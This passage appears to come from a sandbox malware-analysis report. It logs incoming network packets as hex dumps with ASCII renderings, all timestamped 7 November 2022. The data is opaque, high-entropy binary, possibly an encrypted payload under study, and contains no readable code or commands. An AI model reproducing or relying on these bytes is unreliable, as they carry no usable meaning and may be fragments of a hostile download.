87 6c e2 e7 3b 0a 56 b1 e9 45 ed af 88 e1 40 7f d9 21 c7 5d 53 97 88 5f 4f 32 76 d9 f8 55 49 cc 44 04 2b 8d 2f 93 17 32 77 45 f3 bf de 50 ba 41 35 1d 81 01 47 96 72 ee e7 fd 90 df Data Ascii: ][='_#IYRfu`ti%R`#[[wVq,z6uTeY)(qvV^v8(^V.K\N5{_Ok9in-rt[o\Hl@9\|FzFW+N9#3 MA'{gl;VE@!]S_O2vUID+/2wEPA5Gr
2022-11-07 22:49:10 UTC	11225	IN	Data Raw: 03 7e 3e ca f7 36 d7 fb a8 84 e9 19 67 86 c4 88 75 5d 62 38 57 8e 83 e1 fd d1 f1 18 ba 8a c6 b4 2b ac 33 b9 ce e9 8d f7 74 a3 fe 4b 27 93 50 ce 9c ef 0b ae 34 48 a1 74 b6 6f 2b fc 6f 4c 5a 76 f9 67 3c d1 57 6b fe 42 aa 4b f6 99 36 6b ba d3 87 4e a0 95 14 b8 97 df 3d 3b aa 73 41 3f fd 3f 9c 04 93 a9 c5 99 5f 6c 18 3c 1f d0 ec 28 33 4f 7c c7 6d 66 2c 7c c8 5e 17 1b 31 26 21 40 e5 46 2a a0 4e 61 ba 0e 7a c1 53 3c 98 b6 be 6b 2a 8e d9 63 4f 02 12 52 17 e6 22 c4 83 17 08 7c 87 16 b4 33 59 91 40 08 d9 f0 2f a4 d8 5c ae 29 3c 70 cd 83 28 ca 94 47 2c 71 dd a6 35 e6 a6 96 31 01 0a 1a be e0 6b 0e 67 94 86 f8 ba 1c b1 a6 ac a2 38 8f da 55 44 c3 ad 4c 4e d6 a2 e9 2b b4 21 d0 43 96 6d 88 3a 55 e3 c0 ad 1d 7b cf 8a fb 0b f8 bf 06 52 aa 3b 6b 21 00 8e fc 5d 22 1f 80 d2 Data Ascii: ~>6gu]b8W+3tK'P4Hto+oLZvg<WkBK6kN=;sA??_l<(3O\|mf,\|^1&!@FNazS<kcOR"\|3Y@/\)<p(G,q51kg8UDLN+!Cm:U{R;k!]"
2022-11-07 22:49:10 UTC	11241	IN	Data Raw: 09 81 3a fc 17 89 61 5c 43 98 f2 83 62 d6 3d e0 25 1f b1 4b cb 5a f4 60 02 53 7b cc d6 fc df e8 e9 75 00 ef 8a b2 c0 1b f1 a3 61 08 e6 e9 22 31 7b 1b 58 e7 dd 57 78 3a e5 49 e0 7f 3d e1 e3 93 d2 7b e8 e3 65 ee 2c df f9 18 ec 9f e8 42 42 b8 54 d7 37 50 f5 ca d8 de d3 de 8c 51 ef bc 41 d9 2d d9 01 70 cf 86 25 23 f8 63 0a 2b a2 f2 7c b3 62 98 9e 32 4a 83 eb 8a 6e 5c bb 3e 61 f2 77 af 00 35 92 70 e9 cf 6f 77 0e 72 d6 db 58 52 d6 54 62 ff 75 c2 32 00 4f e2 40 4e 27 e2 9b 33 08 62 b7 ac 97 45 9b d6 56 d0 d8 2f 32 06 ef 9c 50 ec 24 d0 55 cd 72 eb 98 ae 0c f2 0f 15 2a b0 b2 a3 5d e5 7a 16 94 67 d9 a5 2b 79 f8 49 bb 15 5c fd 06 0e a5 92 d9 a1 ce 56 08 e7 58 08 7f 5d ee a8 7a 64 8a 76 8f 2a 82 f3 df 5a 4e 91 b4 68 01 d1 cc cf ac 6d f5 a5 d2 22 54 ba 50 22 a8 0b 61 Data Ascii: :a\Cb=%KZ`S{ua"1{XWx:I={e,BBT7PQA-p%#c+\|b2Jn\>aw5powrXRTbu2O@N'3bEV/2P$Ur]zg+yI\VX]zdvZNhm"TP"a
2022-11-07 22:49:10 UTC	11257	IN	Data Raw: cd 10 47 c7 73 b1 f5 d7 b4 53 62 ba 34 1d 8b 66 d3 77 50 78 99 b1 90 44 a8 5a 0c 60 c7 36 c9 8b 31 52 b3 df 99 d9 8d ff 18 27 67 87 e0 f0 7c 82 d6 4a 4e 0f 23 70 72 5e 80 34 50 21 f6 f5 6a 85 e5 e6 4d 0b 99 da 17 ce 11 80 50 02 7e 23 0b 08 6b af da f2 2f 8f a9 0c b6 04 ad eb 9a 97 a9 0b b7 f7 66 9e 3c 26 bf ba 36 27 52 9a eb 05 bc db bb 26 32 ea 4d 83 20 1f 99 74 35 1a ee 16 6d 6e 99 2c fc e3 b8 2a b3 ff 5d 4d 50 cb 87 f6 10 a4 bb b2 42 b8 9a b5 0c 4e bd aa 78 d0 f0 7b 2f 3d 4a 35 c5 d3 73 9d 32 3d 7c c9 64 41 a5 09 25 0a 12 c1 98 cd 84 36 d2 ec 02 a6 e7 dc 11 08 fc 65 b8 15 0c cb 26 03 c9 51 19 fa d8 52 31 d5 01 19 fb 25 29 61 59 6e ec ed 5b f7 21 38 de e1 a2 c9 82 36 5b 66 88 3c c1 9b 87 79 13 6a 44 a7 8d 2d 44 4c 1b 65 78 5e 81 6c 9d dd 6c c7 0f 19 a9 Data Ascii: GsSb4fwPxDZ`61R'g\|JN#pr^4P!jMP~#k/f<&6'R&2M t5mn,*]MPBNx{/=J5s2=\|dA%6e&QR1%)aYn[!86[f<yjD-DLex^ll
2022-11-07 22:49:10 UTC	11273	IN	Data Raw: 10 bd 45 49 b4 da e6 32 04 1b 3c cc e9 73 bb 5c 1d 3f 97 db 49 78 df 11 ab 34 4e 57 f1 2e 4c 58 a0 73 fa cd c3 78 8a 1f 4c 69 b8 78 54 77 0c 30 c3 a2 3d 2f d1 b8 be 4b 55 b5 7f 8a 9d 00 13 dd 28 35 f9 44 58 e2 f2 34 5f 8d e4 89 50 79 bf ae 94 e2 48 8a dc c6 ef 32 33 bd ff 58 f4 01 10 d2 4c 9c 45 80 52 81 b7 05 b1 b5 70 71 b1 c9 fb fd 2f 0a 11 ab ce e3 a4 f2 14 4b 9c 4a 9d 00 a4 e1 c3 78 fd 35 96 1d fa 95 b7 e3 df 3d fb dc 72 3a d2 39 45 86 57 47 64 21 e1 4c 1e 79 32 bc 08 24 8c 81 38 00 c0 a0 75 dc 30 2f 17 ae 91 12 10 a4 8d 16 16 f7 8c 53 21 e5 3b d3 9e 69 29 e7 53 d6 6a 49 7d 7c b6 a1 68 fc 8c cc 32 8f 0d 7a e4 df bb 6b 99 95 31 b6 52 b0 1e fe 56 9e fb 1a 3e 39 11 ac f8 18 2d 86 0c a3 e8 36 7e 77 14 62 b9 34 03 fe b5 09 9d f1 22 09 63 50 1b b6 fb 20 10 Data Ascii: EI2<s\?Ix4NW.LXsxLixTw0=/KU(5DX4_PyH23XLERpq/KJx5=r:9EWGd!Ly2$8u0/S!;i)SjI}\|h2zk1RV>9-6~wb4"cP
2022-11-07 22:49:10 UTC	11289	IN	Data Raw: a4 59 18 69 02 c1 42 c4 95 5f 52 cf 9e e5 ea 22 d2 73 55 48 78 cc 51 b6 38 25 b8 e4 22 36 c3 74 92 38 ce 62 d5 94 f7 80 e9 53 d8 14 96 db c8 ce ea 1c 48 63 0c 03 64 1a 66 f1 66 b2 13 56 9d 24 d3 f2 24 41 d8 d6 46 73 68 cd 82 01 23 0b 9c 3b 36 d6 96 aa 2f 69 66 30 c5 ff 9b 97 f3 4a 1a fd 7e 30 91 fb bd 60 12 28 91 7b 13 89 b7 30 6c e3 9d b1 b5 7f ee ff b5 32 3e c9 f4 79 a7 fe b4 d6 18 87 32 06 11 6f be 5b 9d da 4e e2 01 e5 74 c7 21 7b 57 e6 78 75 5b bf 0b ba c2 56 3e 9b e4 0f 97 76 5a 0a 97 92 02 92 73 ea fd 5c bf 32 ac 5b f5 6f 83 f3 28 2a bb c1 1e 9c 9c 35 7b ec 41 6d 5d ec 19 6c 10 0e 7b c7 2d 77 f4 e5 7e bf cd ac 3b 4d ef 6b 81 a8 5d 23 27 f4 9b 03 21 55 d8 e9 e6 40 d3 89 57 99 54 a7 dc 34 d4 ed d3 bd 91 ae 24 cb 6b 65 9f 29 98 d9 37 49 df b6 4e bb 39 Data Ascii: YiB_R"sUHxQ8%"6t8bSHcdffV$$AFsh#;6/if0J~0`({0l2>y2o[Nt!{Wxu[V>vZs\2[o(*5{Am]l{-w~;Mk]#'!U@WT4$ke)7IN9
2022-11-07 22:49:10 UTC	11305	IN	Data Raw: 38 72 d5 47 dc c2 32 c0 ac 7d f3 d0 74 2c e4 3a b4 c0 be 77 3d d2 40 b3 f5 fa bd 0b d0 e6 eb 68 bb 35 30 33 21 c4 9a 25 12 a1 af 29 40 26 00 72 7f 80 b4 d8 9c c7 93 b4 36 48 19 47 41 61 91 44 b3 d2 6e e8 7f 8a 7e cd 93 eb 9a 89 9b d6 62 89 e3 95 e3 66 ee 42 c9 e5 5f d9 d8 73 66 5e c2 ac c4 25 39 fa db 39 13 fa 03 f2 01 44 1f 3b f4 33 54 18 c9 3c 30 f8 9d 0c 34 ff a7 96 d0 80 60 59 82 0d 46 82 54 d9 51 12 43 32 21 ee 3c 2a 19 f8 d6 bf a9 e6 99 45 98 f1 65 b7 8e fa 82 a0 49 9c cc d2 2a 4b 5f 54 7f 88 77 78 64 a0 2f 85 e9 78 13 99 e2 74 1d 11 7a d0 e9 c8 73 87 17 1c 01 fb 70 01 e8 78 4a 6c 52 63 60 6a 32 b2 96 8e ff 60 77 5a 18 c7 fe 14 65 47 c2 a9 54 dc 72 2e 9d 40 b9 56 0b c2 42 9d 09 c3 ee f7 cb 64 14 b1 5f 33 60 98 64 e0 d8 18 a6 f7 e9 af 96 19 eb db 87 Data Ascii: 8rG2}t,:w=@h503!%)@&r6HGAaDn~bfB_sf^%99D;3T<04`YFTQC2!<EeIK_Twxd/xtzspxJlRc`j2`wZeGTr.@VBd_3`d
2022-11-07 22:49:10 UTC	11321	IN	Data Raw: 79 7a b1 06 2c bc cf cb 00 d1 0b 1a 02 ed 81 c0 02 fc 4d ba b5 0b 13 d8 55 f6 5a 0f 6f b2 2a 7f 35 9f 67 60 9d fc 9d d1 6a 88 2e d4 7f 42 8b 16 2c 9f 46 9e 0c 9a 9c 6f 04 a7 78 83 62 40 92 22 ff 46 57 69 36 64 55 49 01 69 bb b7 df b5 70 dc d3 d2 a9 b3 d9 1c a4 4e 1a 89 e9 7b 4c ff c1 ef 26 74 dc c9 d4 cb 1d 4a 24 9e e7 d2 09 2e 37 74 9c f5 46 68 06 f4 52 31 10 a6 70 23 ea b7 04 f0 e2 47 3d 16 ac 1c 4e f4 85 b2 c2 f3 94 59 cf d4 31 30 10 79 f2 ab e7 30 86 2c 59 de ba 6f 64 74 0f dd 6c 9c 1f c5 90 7d 97 5b c0 88 16 30 fd 3a 8c 10 04 e2 1c 0c 83 fd 27 8d d3 5e 99 d5 b4 66 b4 39 f8 50 59 65 8b a3 e0 f5 3b e6 f7 60 fd d1 32 3b 55 81 66 2a 0e 1d 65 1b 9b 20 fe 5c e2 81 d4 d3 42 00 cc 50 bd e2 42 9c 25 cf 1a 2f d9 1a 9b 54 f1 3c c6 1e 25 8d bb f7 98 2d 74 fd bf Data Ascii: yz,MUZo5g`j.B,Foxb@"FWi6dUIipN{L&tJ$.7tFhR1p#G=NY10y0,Yodtl}[0:'^f9PYe;`2;Ufe \BPB%/T<%-t
2022-11-07 22:49:10 UTC	11337	IN	Data Raw: 45 63 6c 44 85 a3 a1 07 4d 17 0a 40 2e bf 02 0e f3 b8 a7 e0 b1 46 a6 31 8c de c6 33 9a 99 a6 a9 4a d8 ea 76 1e 89 bd 4d 4a 88 d1 8d 36 03 ac f5 f5 ed 0f 76 bf 83 ca 81 5e a9 7d c7 a5 b8 84 e0 94 36 6b c1 3a a8 d3 44 58 da 26 a0 2b 0e f7 22 8d ac c8 1d e3 af 62 36 d2 bf 6f e7 bf 4a 83 2a c6 82 a2 a4 5c 4e d1 97 65 b0 71 8b b2 a9 6c 64 b4 49 89 5a d7 34 48 b6 87 02 e4 a7 65 67 83 c8 7a 54 be c4 ab 3f 08 6e ac ac 68 e0 aa 51 21 b9 6b 87 12 38 da f6 b6 56 db 3f 55 2e 34 b6 76 f0 49 c1 41 00 71 5c 9d 42 2d e5 6f ab 6d 1f 32 0e 06 5e 42 a9 45 84 15 04 dc c9 c6 e4 ab 51 62 46 5a a9 45 b3 bb 1a 78 0d 80 b0 65 cc 95 ec e4 5a bb a5 12 26 94 12 d6 80 c6 22 6c 52 b3 14 c0 42 66 9c ad 55 80 c1 02 0e a5 24 f6 2b 31 ab b1 84 32 73 31 7e 64 aa f1 29 99 c9 29 49 d7 6f 79 Data Ascii: EclDM@.F13JvMJ6v^}6k:DX&+"b6oJ*\NeqldIZ4HegzT?nhQ!k8V?U.4vIAq\B-om2^BEQbFZExeZ&"lRBfU$+12s1~d))Ioy
2022-11-07 22:49:10 UTC	11353	IN	Data Raw: 66 53 b4 b2 6c 27 3c 75 63 b3 a3 89 0a f8 a3 d9 fe 5e c0 90 29 bc 7c a9 fe 2a 21 5f c9 3a 92 7b 0f 02 dd e2 ee 36 08 23 72 f3 bf 8d 8e a1 4d 4f 01 44 00 a6 30 4e ed 68 4f e5 19 15 85 6b 67 da f8 50 67 ad 03 31 de 10 1d 74 92 c5 cb 18 00 af 6c 18 c9 9a 8f 5a 81 82 92 bd 36 59 79 d7 7d 17 98 34 1b 5f 63 45 e8 d5 4f 0e 71 92 04 61 f0 cf 15 51 7d 4f ec eb d5 5a fa 37 71 fb 63 5d 39 1f 68 d4 29 fc b1 50 be 40 b1 96 03 4a 7f 42 ae ef 21 34 4d 45 97 fb 5f 3f 40 d6 3f 0d 17 82 e8 5f 27 a1 d4 f7 c8 97 d0 ba b7 45 37 9f fa 3b 6b a8 29 ee 00 ff c5 22 cc 78 66 df c8 8b d9 9b f9 a2 39 0e 06 a0 2b bc 00 61 89 10 7e fb 15 21 d4 a3 59 34 86 c7 ba a2 2d b8 c4 08 59 75 87 40 0d a1 83 54 67 93 64 43 41 07 5e a1 07 c2 e4 c8 3e d3 45 4f 08 99 8f 44 86 8c 75 e2 8a 34 03 21 46 Data Ascii: fSl'<uc^)\|*!_:{6#rMOD0NhOkgPg1tlZ6Yy}4_cEOqaQ}OZ7qc]9h)P@JB!4ME_?@?_'E7;k)"xf9+a~!Y4-Yu@TgdCA^>EODu4!F
2022-11-07 22:49:10 UTC	11369	IN	Data Raw: 2f 05 c5 07 ce 77 c2 f6 7e b3 50 ed 85 82 35 a3 fa 51 4d 22 0d 9e 74 34 0f 71 54 4e ad cf 06 97 1e cd c1 b4 ef 65 7b 5c 6a 1f e2 27 98 5d ab 68 73 70 ad e5 ed bd 0d e0 54 e1 21 0d 89 3a 95 62 f0 bd e8 93 b1 cc 36 f0 df 9a 70 11 23 6c 9e 40 46 9a 82 76 5d 3f 59 d5 90 94 16 41 c2 05 68 ec 87 ac 50 c5 f8 0d b6 50 3d 88 28 4a f8 33 1f 4f 30 e0 6c 66 f6 b8 ba c8 c9 82 f5 e3 84 f7 4b 29 83 2d 9c 8e 73 0a dd 62 fa e9 6b 71 33 78 60 cd c5 75 33 00 8a da dd d7 47 3b a1 2d ca 56 b7 04 f4 e8 10 76 0b 2e fd fc cb c1 03 00 9e 8e 7e 68 da a5 da e2 63 ba 73 62 ba 6b 6b 0d ff e4 f3 36 db 32 d0 eb 06 72 1b 77 eb e4 c7 96 6e 9b 1c 0a 76 f9 19 06 71 a0 08 7f f3 07 7b a0 b1 3e 55 90 45 68 25 cb 91 e6 e1 b9 67 51 37 61 d4 50 f4 e9 5b 59 69 ee e0 b8 84 e5 65 32 af f8 ec 63 61 Data Ascii: /w~P5QM"t4qTNe{\j']hspT!:b6p#l@Fv]?YAhPP=(J3O0lfK)-sbkq3x`u3G;-Vv.~hcsbkk62rwnvq{>UEh%gQ7aP[Yie2ca
2022-11-07 22:49:10 UTC	11385	IN	Data Raw: 2d c3 54 00 2d 5c 92 be 9d d8 64 06 ff 57 bb 1f cb 11 dd 8a 24 fe e3 5f d0 54 bd 4a fd 31 f0 36 30 24 3b 18 42 4c 7e 5d 4f fd 40 4e 43 9e 96 ef 21 9b 28 ec 6a e3 be 11 c1 86 e1 4d c2 2a c8 e9 29 d5 36 3a b9 db 65 48 e2 a8 a8 b1 8f 30 d0 86 89 cb b3 68 e8 af a8 78 9b 4f 86 e7 b5 dd 6a cf db d0 d3 2d e1 71 6c 8c 94 57 c7 4b 05 cc ba eb 18 08 63 1e d1 b1 95 83 40 a9 ee f5 04 a0 91 76 c5 63 fb 21 d7 16 1e d1 86 43 a3 42 44 91 1f b9 b9 6e 83 df 10 8f ba 92 e7 56 41 33 3c 0e 3a 01 6a 64 99 27 c2 ab c4 05 79 5e 22 38 01 c6 8d 46 fb 01 d7 07 ba 87 a3 8d 3d c5 1b 02 12 a2 91 f7 de 53 1b ec e5 dc c6 ec f4 1f 8d 67 dd 99 b5 85 20 1b 7f 8c 8e d9 b3 e9 da ad dd e3 dc 33 91 7d 50 4d 68 f3 ec 10 be 80 fc 98 75 9e 3a 05 16 db e1 b5 01 11 da d9 85 35 3f c5 5a 8a f7 43 e0 Data Ascii: -T-\dW$_TJ160$;BL~]O@NC!(jM*)6:eH0hxOj-qlWKc@vc!CBDnVA3<:jd'y^"8F=Sg 3}PMhu:5?ZC
2022-11-07 22:49:10 UTC	11401	IN	Data Raw: d7 f5 fa 7c 6b 91 69 04 07 43 81 3f bf e1 2a cf 46 e4 27 7b 2e 0e 91 9f d9 0d d5 ac d7 4f 9b 7c 29 71 0a 16 5e c2 48 48 00 77 00 8b 96 9c 5b d1 9e 5f 9e 61 88 81 ed 0b 77 f8 fa 65 62 33 0b 24 8e 35 d9 10 2f 90 03 a9 1f de 71 5f af c5 f8 bf b7 d2 f8 e6 73 7e e4 b3 e6 9b 84 2a 6a 67 8e 85 78 b6 b7 59 69 ee 3f 7f 37 22 2c 62 1e 5e 5a 07 87 6a ef 95 d9 4f ba 8e cb 55 dd fb f4 3a c7 4b fe 1c 39 d3 13 94 1a ef 96 cd 6f 64 2b 45 f0 0d f4 fe 35 26 63 57 04 c1 3f 61 89 f9 9e dd c5 18 c2 12 1c 85 6e 8f 50 f1 df f2 f6 f6 ba aa 9e 36 4d 39 ca c8 21 a7 41 fb 86 be 6b ef 64 41 c6 8e a5 1b 7c 40 e2 01 87 1f a5 52 14 58 d1 a9 44 d8 24 d7 de e0 a7 94 fa de 51 ad 80 db ef 81 1f 74 81 6c b7 6d 13 5d 0a 8d f5 fd 61 fc ce a1 0e bd e6 7f 30 8d 19 65 73 b1 f4 02 8b 71 f2 5f 78 Data Ascii: \|kiC?F'{.O\|)q^HHw[_aweb3$5/q_s~jgxYi?7",b^ZjOU:K9od+E5&cW?anP6M9!AkdA\|@RXD$Qtlm]a0esq_x
2022-11-07 22:49:10 UTC	11417	IN	Data Raw: 74 a6 d8 45 46 8a b3 ec 3a be 2d d6 2d a2 7b 60 95 38 6f c1 07 3d 54 52 28 7c c7 06 c3 75 1c c3 ab 62 d8 0c 8a 2f ed 16 aa 69 dc 15 ce aa e7 6b 27 20 fb 1b 28 1b ac a2 a0 13 57 b2 cf d3 a8 cc 7c 4a fa 91 c3 8c 81 7e a9 cc 35 ce 1b f6 9e e9 7f 78 c0 87 28 40 d8 4f 84 5b dd 55 4a d9 7f 2b f1 93 88 74 06 ce 4a b3 cc a9 4b 75 c3 31 95 44 3d 3f 41 c3 f6 57 b3 10 1d d2 7a af e2 49 36 97 32 a6 4e 41 f4 eb da 43 c5 d1 62 d3 0d 54 ea d9 87 6e 83 fa a1 11 10 5e 3a 7a 26 b6 ce 6e 70 89 b4 6e b4 5d 9b 11 68 32 10 aa 7e ba fd 08 70 8e 8b a9 2c fb 19 45 a5 cc 10 e6 0b 0b ff e3 db 9e 64 ec 0b 08 4c ed 3a ba da c4 ca d3 32 53 ed e1 e9 3b 48 b2 8c 02 03 74 c8 d2 1e ba d0 57 17 30 98 0a 02 5f 0e b1 28 c0 50 99 14 88 e9 85 ee 3f 40 90 ce ea ef 5f 3b f7 6f 79 30 22 3a 92 52 Data Ascii: tEF:--{`8o=TR(\|ub/ik' (W\|J~5x(@O[UJ+tJKu1D=?AWzI62NACbTn^:z&npn]h2~p,EdL:2S;HtW0_(P?@_;oy0":R
2022-11-07 22:49:10 UTC	11433	IN	Data Raw: 2d 97 b9 fe ab 57 0b 7e cd c5 29 d8 af 1c c1 2a c8 54 22 64 66 7f d7 ef 42 8f a2 7d 42 19 27 62 6b 76 73 c9 2d 3c 50 ef c2 aa 97 15 1b b2 c0 d1 5a e6 a4 c8 02 27 4f a4 7c 2f dc 74 bc a4 11 f9 93 e1 48 ea ab 71 b3 36 9c e3 63 36 91 c1 23 4d 1e 9a 0b ec c6 f9 14 ec 65 2f 75 5e fb 8d 81 af 82 81 40 31 a0 4b eb 93 aa 25 eb c1 c0 00 d0 18 72 39 39 16 82 ab bb e0 5b 67 50 e9 aa b8 d0 c1 bd a8 ea 38 4a 76 30 ba 16 9d ad 80 c2 00 e7 98 2e 8b b8 b3 8d 94 19 cb 72 6a f8 7b 9e 7e cf f6 76 c3 a4 2c ce 7e 86 b5 b4 70 08 7e 84 f7 92 39 b7 7b 20 ca 49 b6 56 b2 50 c3 d1 7b 81 4c ec 29 c6 90 59 e6 e7 1d 3f b3 1b 37 cc 6e 33 f8 ba 77 15 5b dd 83 c7 3e a9 ab d6 d6 34 00 da 8c 7a e3 9e e4 13 8f 0b 93 5f 52 85 dc 5f db b1 e3 08 33 06 25 be 3b 53 f8 8f f8 af 62 f3 df c8 b2 57 Data Ascii: -W~)*T"dfB}B'bkvs-<PZ'O\|/tHq6c6#Me/u^@1K%r99[gP8Jv0.rj{~v,~p~9{ IVP{L)Y?7n3w[>4z_R_3%;SbW
2022-11-07 22:49:10 UTC	11449	IN	Data Raw: b7 13 6c 80 e5 e2 7c 32 75 38 7d ce 32 26 a3 45 2c ca 7d 06 f7 4f 81 98 60 55 cb ce 1c c3 df 91 dc d7 45 0e 2d 2d 66 1c 4a 8d 59 73 87 6a f9 7d 2f f4 9e b4 7c 46 ac 22 c1 c4 52 62 1a 2d 37 c2 35 45 a1 b3 8a de f3 1c 64 d6 07 e1 8a 3d c3 d6 6d 1f 24 a3 62 44 8e ae 80 90 1c ce 37 74 9f 60 b1 2c ae fc dd 5b ee a4 1f 92 93 e8 43 f3 f7 20 ea 52 dc 4b a7 d6 cf 43 aa 73 f1 9a 32 ac d4 02 2b cf 99 c0 6e 26 18 e1 0a e4 d4 00 41 7d ee 09 3d 45 5b 7a 97 9f 6f f4 35 a3 a5 89 1e ac f0 40 ae dd ba 70 60 aa ac 82 db 45 7b a2 44 46 56 f2 db c7 a1 25 f6 8f e3 ea 4d 25 98 c9 26 4f c3 91 f1 6d b4 d9 72 72 4d af 5d 47 32 24 3f cc 09 01 9c a7 25 4d 09 6e 28 33 6b 2e 17 89 27 bb 74 a9 35 ca ef 76 59 64 df 16 a2 b1 83 3b 36 74 39 07 68 82 98 97 58 51 7d bd 86 98 e7 dd 21 63 98 Data Ascii: l\|2u8}2&E,}O`UE--fJYsj}/\|F"Rb-75Ed=m$bD7t`,[C RKCs2+n&A}=E[zo5@p`E{DFV%M%&OmrrM]G2$?%Mn(3k.'t5vYd;6t9hXQ}!c
2022-11-07 22:49:10 UTC	11465	IN	Data Raw: 52 bf 8f 3e 37 79 cb cc 09 99 27 f2 5a 03 92 db ad b1 12 05 87 25 ea b6 04 cc c0 7e 52 ba 81 71 a7 08 2b ea c1 5b 67 19 fc 0a 9f 05 b3 f0 43 6a 98 26 4c 1f 4c 1c ec a8 94 32 54 d0 95 bd 39 e7 d1 a7 0f 44 01 f5 7e 8c bf 36 72 23 85 f6 ef bd 0a 3d 8c 7c 20 d1 d9 1f b7 7d b6 a9 66 e8 74 f2 dc 0c 9e 52 d5 1f 42 dc 0f fa 49 a6 e2 35 96 2e 1d ac a8 0f 5e f4 f8 e2 d8 94 48 14 7d 08 3f 61 f7 4f 43 e5 8a 3f b1 7e 58 34 54 e4 05 7b 2b c1 d3 be 8c b3 06 a6 8b d4 e7 0e d5 fb fc f7 57 45 4e 60 1d 3c a9 1d 8d 92 17 0e e9 2b 54 ad cd d4 78 ae 07 1f 73 af 04 e9 21 27 25 63 e4 8c 34 7d 2b e9 e0 bf 17 3f b2 25 8f d3 42 c4 4d 32 1c 6f d7 68 99 b0 a8 f6 05 9f dd 3f f7 d1 c4 00 c8 17 4b 18 e0 42 f8 71 b9 38 a4 07 12 d1 fe 07 53 84 94 29 3c db 8f d6 16 e2 f0 f0 ab f9 19 96 01 Data Ascii: R>7y'Z%~Rq+[gCj&LL2T9D~6r#=\| }ftRBI5.^H}?aOC?~X4T{+WEN`<+Txs!'%c4}+?%BM2oh?KBq8S)<
2022-11-07 22:49:10 UTC	11481	IN	Data Raw: fe 32 59 0d bd e5 0a b6 d4 c2 5f f4 93 11 92 cf 95 65 76 c2 de 9d 9d 06 f9 59 66 94 b6 36 ba bd 8a 01 7a 5d f7 6b 06 31 aa 1d 56 70 90 9a 4e 0d f3 f3 81 50 85 69 5e f0 36 2d 73 9a 63 a3 ea 11 3a 12 ec 83 0f 38 15 02 c0 a3 42 23 17 ea e9 31 f1 28 b9 dd 0d 89 31 dd 5a 08 d5 62 9b f0 d8 20 ad af 15 ba 1e 81 4e 50 54 6d 18 7a 13 b4 be 67 80 3f 70 e2 91 95 dc a4 51 5c 92 d9 59 ab b3 57 b0 13 09 d2 c3 70 f9 9b c9 ab 9d e5 b1 fc 3a 90 18 57 0b d5 4b 06 29 9c 10 85 48 5e 05 69 b9 6c d0 0b f8 15 90 c9 af 0c 1e 04 91 d3 99 79 99 b9 db c1 02 55 c5 61 bc ea 6b 16 27 bd eb d5 77 05 26 2b 47 06 6f 79 3f 3a 6f 10 4e 66 45 63 a2 5a 11 61 35 ff 43 42 5c d2 83 05 ea f0 4c eb 74 a4 50 2e 4a 3d a0 3a 57 20 5e cf 44 4b fe 4e 20 b0 c1 4c f9 91 c0 40 4e a7 cc 1d bf 8f 4a 6f 52 Data Ascii: 2Y_evYf6z]k1VpNPi^6-sc:8B#1(1Zb NPTmzg?pQ\YWp:WK)H^ilyUak'w&+Goy?:oNfEcZa5CB\LtP.J=:W ^DKN L@NJoR
2022-11-07 22:49:10 UTC	11497	IN	Data Raw: e4 ac de 7a af ab 8f 41 f0 d1 2c 9d c7 f2 59 45 b7 13 cc 43 d2 76 f4 2d bd 0b d9 dc cc f9 72 25 5c 90 2e fc 03 25 83 4b a5 31 ce ad bc 8b 6b 72 93 ba e3 79 ac dc c4 23 84 21 e1 1d c0 20 fe 9c b5 69 7d 3e 2e 77 12 c2 47 3c 3f 3a 2a 62 c7 5d 0a fb 3d e1 25 51 b3 a6 14 09 c4 75 70 b0 38 70 84 5c dd 9f 25 70 17 52 72 fa 1d 37 99 37 2b 39 50 ed fb 31 e4 a5 76 88 8e 01 2c 6f f1 c5 46 c8 0b a1 53 1a bb 6c e2 d3 7a b2 79 58 a5 f6 8d 76 5f cc 77 18 5b b0 73 eb d6 b8 7c c4 a8 a5 99 d9 02 38 54 9c 2c 92 ef e5 06 71 35 00 7a 2f 1a c0 aa 87 ca 8a b1 7d 78 8b 86 b0 8e 00 09 38 1a 67 c7 41 74 82 68 8f 0f e6 00 22 98 2f ca 40 5e 45 f5 91 0f 72 64 e5 6b f6 43 bc b9 29 9d 1a de 41 67 6b 0d 50 ee 11 80 53 a9 18 66 4c 46 06 94 fa d1 00 66 1f df fa 8d 8f c4 6f 5c db 32 4f 9d Data Ascii: zA,YECv-r%\.%K1kry#! i}>.wG<?:*b]=%Qup8p\%pRr77+9P1v,oFSlzyXv_w[s\|8T,q5z/}x8gAth"/@^ErdkC)AgkPSfLFfo\2O
2022-11-07 22:49:10 UTC	11513	IN	Data Raw: 97 56 7c e7 82 95 b1 c1 33 59 f2 4c 19 73 0c 4b 55 86 73 87 69 43 b3 14 36 a9 ff ff 3e 77 6f 56 22 4e 38 cf 87 0c ae d4 98 2f 6c 25 fb 46 3b 05 46 36 83 32 d8 5a 99 ad 07 fe 5b d4 f3 d9 53 b6 6f 15 66 d9 46 f2 e5 fd b3 fb e4 7b ec 36 48 26 96 03 4b f2 f6 c6 bc 2d d3 f1 9d 04 38 79 2e 2a c3 34 3f 9d f2 f0 c6 08 18 c1 70 48 d6 5c a8 c7 55 0c 2b 22 fb ae 21 d6 0c dd 73 53 c9 7c de 22 08 7e c5 7b 52 63 af c7 09 e3 2d 99 6b 6b 0a 1d c0 ad 71 9e 78 3f 0c aa d7 ee f5 96 19 f4 5d 1f 2a 10 e1 9c e3 b1 dc 4e b9 58 48 44 25 54 6e e7 3c 3b 05 84 a2 8d 58 db c2 e3 fe ac 9d a3 6f 61 1e b0 c5 17 c0 68 aa 17 ee b4 b7 58 38 10 1d be 07 04 36 75 4a 0e e5 3c 5d 9b 91 43 5d 35 10 1c 7d 23 62 77 9b 06 1f 0c 33 0b 7c c6 9b c9 8c 13 af 3f 40 05 a5 94 63 67 c9 f5 d3 8d be f6 31 Data Ascii: V\|3YLsKUsiC6>woV"N8/l%F;F62Z[SofF{6H&K-8y.4?pH\U+"!sS\|"~{Rc-kkqx?]NXHD%Tn<;XoahX86uJ<]C]5}#bw3\|?@cg1
